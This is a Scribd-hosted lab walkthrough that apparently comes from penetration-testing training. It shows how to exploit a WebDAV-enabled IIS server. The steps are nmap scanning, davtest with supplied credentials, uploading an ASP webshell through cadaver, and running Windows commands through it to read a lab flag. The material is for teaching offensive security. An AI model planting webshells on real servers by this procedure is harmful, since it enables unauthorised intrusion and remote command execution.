Scribd
Upload
75 views10 pages

Windows IIS Server DAVTest

This document outlines the steps to exploit an IIS server using WebDAV by checking the target IP, running Nmap scans, and utilizing the davtest and cadaver tools to upload a backdoor. After successfully uploading the backdoor, it demonstrates how to access it and read a flag from the C: drive. The document serves as a reference for commands and procedures rather than a comprehensive guide.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
75 views10 pages

Windows IIS Server DAVTest

This document outlines the steps to exploit an IIS server using WebDAV by checking the target IP, running Nmap scans, and utilizing the davtest and cadaver tools to upload a backdoor. After successfully uploading the backdoor, it demonstrates how to access it and read a flag from the C: drive. The document serves as a reference for commands and procedures rather than a comprehensive guide.

Uploaded by

Harlian
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Name Windows: IIS Server DAVTest

URL [Link]

Type Windows Service Exploitation: IIS

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run a Nmap scan against the target IP.

Command: nmap [Link]


Step 3: We have discovered that multiple ports are open. We will be focusing on port 80 where
the IIS server is running.

Running http-enum nmap script to discover interesting directories.

Command: nmap --script http-enum -sV -p 80 [Link]

We have found the webdav directory also received 401 error i.e Unauthorized.
Step 4: Running davtest tool.

Command: davtest -url [Link]

We can notice, /webdav path is secured with basic authentication. We have the credentials
access the /webdav path using the provided credentials i.e bob:password_123321

Command: davtest -auth bob:password_123321 -url [Link]


We can notice, we have uploaded almost all the important file types to the /webdav directory.
Also, we can execute three types of files. i.e asp, text, and html.

Step 5: Upload a .asp backdoor on the target machine to /webdav directory using cadaver
utility.

The .asp backdoor present in “/usr/share/webshells/asp/” directory. i.e


/usr/share/webshells/asp/[Link]

Command: cadaver [Link]


Enter credentials: bob:password_123321

We can interact with the webdav directory using the cadaver tool.

Step 6: Uploading asp backdoor to the IIS web server in webdav directory.

Command: put /usr/share/webshells/asp/[Link]


ls

We have successfully uploaded the backdoor.

Step 7: Access the backdoor using the firefox browser.

URL: [Link]

Enter credentials: bob:password_123321


We can enter windows commands in the yellow highlighted field.

Check the current running user.

URL: [Link]
We are running as an IIS apppool.

Step 8: Read the flag.

Check the content of the C:\ drive.

URL: [Link]
We can notice, there is a [Link] file present in the C:\ drive. Reading it.

URL: [Link]
This reveals the flag to us.

Flag: 0cc175b9c0f1b6a831c399e269772661

References:

1. DAVTest ([Link]
2. Cadaver ([Link]
3. ASP Webshell
([Link]

You might also like